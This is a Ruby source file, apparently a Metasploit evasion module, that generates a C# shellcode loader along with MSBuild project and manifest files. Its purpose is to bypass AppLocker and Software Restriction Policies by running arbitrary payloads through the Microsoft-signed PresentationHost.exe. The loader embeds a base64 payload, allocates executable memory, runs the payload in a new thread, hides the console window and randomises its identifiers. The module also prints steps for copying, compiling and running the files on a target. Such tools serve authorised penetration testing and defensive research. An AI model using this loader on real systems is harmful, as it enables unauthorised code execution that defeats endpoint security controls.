GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/applocker_evasion_presentationhost.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
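class MetasploitModule < Msf::Evasion
  # Number of distinct randomised identifiers the generated C# source needs
  # (one class name, locals, fields and the ShowWindow parameter name).
  IDENTIFIER_COUNT = 11

  # Per option: the name used when the option is blank, and the suffix the
  # supplied name is expected to carry.
  FILE_SUFFIXES = {
    'CS_FILE' => ['presentationhost.xaml.cs', '.xaml.cs'],
    'MANIFEST_FILE' => ['presentationhost.manifest', '.manifest'],
    'CSPROJ_FILE' => ['presentationhost.csproj', '.csproj']
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',
        'Description' => %(
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binary
          PresentationHost.exe to execute user supplied code.
        ),
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # presentationhost bypass research
        ],
        # The framework license constant, not a literal string.
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Targets' => [['Microsoft Windows', {}]]
      )
    )

    register_options(
      [
        OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),
        OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),
        OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])
      ]
    )

    # This module writes three files named by the options above, so the single
    # FILENAME option (presumably registered by Msf::Evasion) is not wanted.
    deregister_options('FILENAME')
  end

  # Base64-encodes the encoded payload so it can be embedded in a C# string literal.
  #
  # @return [String] base64 text
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # Returns a random 8-character alphabetic string, used as a C# identifier.
  #
  # @return [String]
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # Returns +count+ distinct identifiers drawn from +obfu+. A duplicate would
  # produce a redefinition error when the generated C# is compiled, so any
  # repeated name is discarded and drawn again.
  #
  # @param count [Integer] how many identifiers are needed
  # @return [Array<String>]
  def unique_identifiers(count)
    names = []
    while names.size < count
      candidate = obfu
      names << candidate unless names.include?(candidate)
    end
    names
  end

  # Renders the .xaml.cs source compiled by the generated project. The base64
  # payload from +build_payload+ is embedded as a string and every identifier is
  # randomised on each call.
  #
  # @return [String] C# source text
  def presentationhost_xaml_cs
    esc = build_payload
    ids = unique_identifiers(IDENTIFIER_COUNT)
    <<~HEREDOC
      using System;
      class #{ids[0]}{
      static void Main(string[] args){
      IntPtr #{ids[1]};
      #{ids[1]} = GetConsoleWindow();
      ShowWindow(#{ids[1]}, #{ids[2]});
      string #{ids[3]} = "#{esc}";
      byte[] #{ids[4]} = Convert.FromBase64String(#{ids[3]});
      byte[] #{ids[5]} = #{ids[4]};
      IntPtr #{ids[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{ids[5]}.Length, #{ids[7]}, #{ids[8]});
      System.Runtime.InteropServices.Marshal.Copy(#{ids[5]}, 0, #{ids[6]}, #{ids[5]}.Length);
      IntPtr #{ids[9]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{ids[9]}, UIntPtr.Zero, #{ids[6]}, #{ids[9]}, 0, ref #{ids[9]}), #{ids[10]});}
      private static Int32 #{ids[7]}=0x1000;
      private static IntPtr #{ids[8]}=(IntPtr)0x40;
      private static UInt32 #{ids[10]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{ids[1]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{ids[2]} = 0;}
    HEREDOC
  end

  # Renders the application manifest that accompanies the project. The content
  # is static; nothing from the datastore or payload is interpolated.
  #
  # @return [String] XML text
  def presentationhost_manifest
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
      <security>
      <applicationRequestMinimum>
      <defaultAssemblyRequest permissionSetReference="Custom" />
      <PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />
      </applicationRequestMinimum>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
      <requestedExecutionLevel level="asInvoker" uiAccess="false" />
      </requestedPrivileges>
      </security>
      </trustInfo>
      </assembly>
    HEREDOC
  end

  # Renders the MSBuild project. It references CS_FILE and MANIFEST_FILE by the
  # names currently in the datastore, so it must be rendered after
  # +normalized_filename+ has written the final names back (see +create_files+).
  # The doubled backslashes are heredoc escapes and become single backslashes.
  #
  # @return [String] XML text
  def presentationhost_csproj
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
      <Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />
      <PropertyGroup>
      <Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>
      <Platform Condition=" '$(Platform)' == '' ">x86</Platform>
      <OutputType>WinExe</OutputType>
      <HostInBrowser>true</HostInBrowser>
      <GenerateManifests>true</GenerateManifests>
      <SignManifests>false</SignManifests>
      </PropertyGroup>
      <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
      <Optimize>true</Optimize>
      <OutputPath>.</OutputPath>
      </PropertyGroup>
      <ItemGroup>
      <Reference Include="System" />
      </ItemGroup>
      <ItemGroup>
      <Compile Include="#{datastore['CS_FILE']}">
      <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>
      <SubType>Code</SubType>
      </Compile>
      </ItemGroup>
      <ItemGroup>
      <None Include="#{datastore['MANIFEST_FILE']}" />
      </ItemGroup>
      <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />
      </Project>
    HEREDOC
  end

  # Filename hook: with no argument returns the name recorded last, with a
  # non-empty +name+ records it in @fname. +create_files+ sets the name through
  # this hook immediately before each +file_create+ call, which presumably
  # reads it back (Msf::Evasion is not visible here — confirm).
  #
  # @param name [String] filename to record, or '' to query
  # @return [String, nil] the recorded filename
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Writes the three generated artefacts. Filenames are normalised first and
  # written back to the datastore so that +presentationhost_csproj+ and
  # +instructions+, which read the datastore directly, see the same names.
  def create_files
    cs_name = normalized_filename('CS_FILE')
    manifest_name = normalized_filename('MANIFEST_FILE')
    csproj_name = normalized_filename('CSPROJ_FILE')

    write_artifact(cs_name, presentationhost_xaml_cs)
    write_artifact(manifest_name, presentationhost_manifest)
    write_artifact(csproj_name, presentationhost_csproj)
  end

  # Returns the value of option +key+ with its expected suffix appended when
  # missing (compared case-insensitively), falling back to the module default
  # for a blank value, and stores the result in the datastore. A new string is
  # built rather than appending to the datastore value in place, so the result
  # does not depend on whether that value is frozen.
  #
  # @param key [String] one of the keys of FILE_SUFFIXES
  # @return [String] the normalised filename
  # @raise [KeyError] if +key+ is not a known option
  def normalized_filename(key)
    default, suffix = FILE_SUFFIXES.fetch(key)
    name = datastore[key].to_s
    name = default if name.empty?
    name += suffix unless name.downcase.end_with?(suffix)
    datastore[key] = name
    name
  end

  # Records +name+ via the filename hook, then writes +contents+ with file_create.
  #
  # @param name [String] filename to write
  # @param contents [String] file body
  def write_artifact(name, contents)
    file_format_filename(name)
    file_create(contents)
  end

  # Prints the manual steps that follow generation. The .xbap name is derived
  # from CS_FILE by replacing only a trailing .xaml.cs suffix, matched
  # case-insensitively to agree with the suffix check in +normalized_filename+.
  # NOTE(review): with no AssemblyName in the project, MSBuild may name the
  # output after CSPROJ_FILE rather than CS_FILE — confirm before relying on it.
  def instructions
    xbap_name = datastore['CS_FILE'].sub(/\.xaml\.cs\z/i, '.xbap')
    print_status "Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target"
    print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['CSPROJ_FILE']}"
    print_status "Execute using: C:\\Windows\\System32\\PresentationHost.exe [Full Path To] #{xbap_name}"
  end

  # Module entry point: generate the files, then print the follow-up steps.
  def run
    create_files
    instructions
  end
end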